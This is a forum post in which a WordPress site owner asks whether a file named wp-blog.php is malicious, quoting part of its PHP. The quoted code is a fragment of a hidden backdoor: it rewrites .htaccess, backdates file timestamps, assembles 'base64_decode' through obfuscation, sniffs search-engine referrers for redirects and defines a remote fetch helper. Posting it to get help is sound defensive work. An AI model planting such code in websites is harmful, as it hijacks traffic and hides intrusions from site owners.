Strange file

I noticed a strange file in my managed wordpress folder called wp-blog.php. In it, there’s some interesting code. Here’s a snippet:

@ini_set('display_errors', '0');
error_reporting(0);
$track = 'avt';
if (isset($_REQUEST['check'])) {
	$htaccess = '# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^(.+).html$ wp-blog.php?key=$1
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress';
if (file_put_contents('.htaccess', $htaccess)) {
	touch('.htaccess', $actime);
	touch('wp-blog.php', $actime);
	echo 'ok';
}
exit;
}

if (is_dir("wp-includes/Text/Diff/p")) {
	$dir = "wp-includes/Text/Diff/p";
}
else $dir = "wp-content/uploads/wp";

$res = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'];

$redirect = 0;
$fof = '404 not found';

function getRealIpAddr() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
      $ip=$_SERVER['HTTP_CLIENT_IP'];
    }
    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
      $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else {
      $ip=$_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}

$ua = $_SERVER['HTTP_USER_AGENT'];
$ip = getRealIpAddr();
$ref = $_SERVER['HTTP_REFERER'];

if (preg_match("/google|bing|yandex|mail|aport|yahoo|baidu|aol|ask|duckduck|seznam|shenma|naver|haosou|sogou|daum|coccoc|qwant|dogpile|excite|wolfram|rambler/i", $ref)) $redirect = 1;

$ea = '_shaesx_';
$ay = 'get_data_ya';
$ae = 'decode';
$ea = str_replace('_sha', 'bas', $ea);
$ao = 'wp_ccd';
$ee = $ea.$ae;
$oa = str_replace('sx', '64', $ee);
$genpass = "xxx+xxx";
$tdpass = "xxxx";

if (ini_get('allow_url_fopen')) {
    function get_data_ya($mmm) {
        $data = file_get_contents($mmm);
        return $data;
    }
}

There’s more, but this part looks like it’s doing something suspicious.

I’m not a developer and only know a bit about coding, but is this malicious? How could it have been inserted? Also, can it in any way be tied to some 500-error related issues I’ve had recently? I appreciate your feedback. Thank you.

Strange file

Trending Articles

Scuffham Amps - S-GEAR 2.6.0 VST, AAX, STANDALONE x86 x64 (R2R NO iLok2, +NO...

Practice Sheet of Right form of verbs for HSC Students

VHSE First (1st) Allotment 2025 - vhscap.kerala.gov.in

UNIVERSE LEAGUE – UNIVERSE LEAGUE – WAR (We Are Ready) – EP [iTunes Plus M4A]

City Hunter Teledrama – Episode 18 – 07th May 2016

Comment on Proposed Criteria for Identifying Predatory Conferences by Luke...

Bureau of Internal Revenue: Regional Offices (Directory)

Kendrick Lamar – Not Like Us (2024) [24Bit-88.2kHz] [PMEDIA] ⭐️

Inception 2010 Hindi Dual Audio 650MB BRRip 720p ESubs HEVC

East Hull MD admits sexual assaults after another victim comes forward

Download: FK ft Shenky – Nakuyewa ”Prod by: Shenky”

R. v. Sargeant, 2023 ONSC 6406 (CanLII)

Rajasthan Board 10th Result 2016 Roll No wise & Name Wise

Who’s been sentenced at Northampton Magistrates’ Court

मतलबी दोस्त स्टेट्स | Matlabi Dost Status in Hindi – Selfish Friends Status

Family cries out as traditional ruler allegedly abducts brother, extorts N2.5m

Long-Running Conflict In Springfield (MA) Gangland Sphere Has Manzi Family &...

Wondershare Filmora X v10.1.20.16 x64

Man arrested after fracas in flat

Man charged in ongoing Sexual Assault Investigation Derek Nyilas, 46, Faces...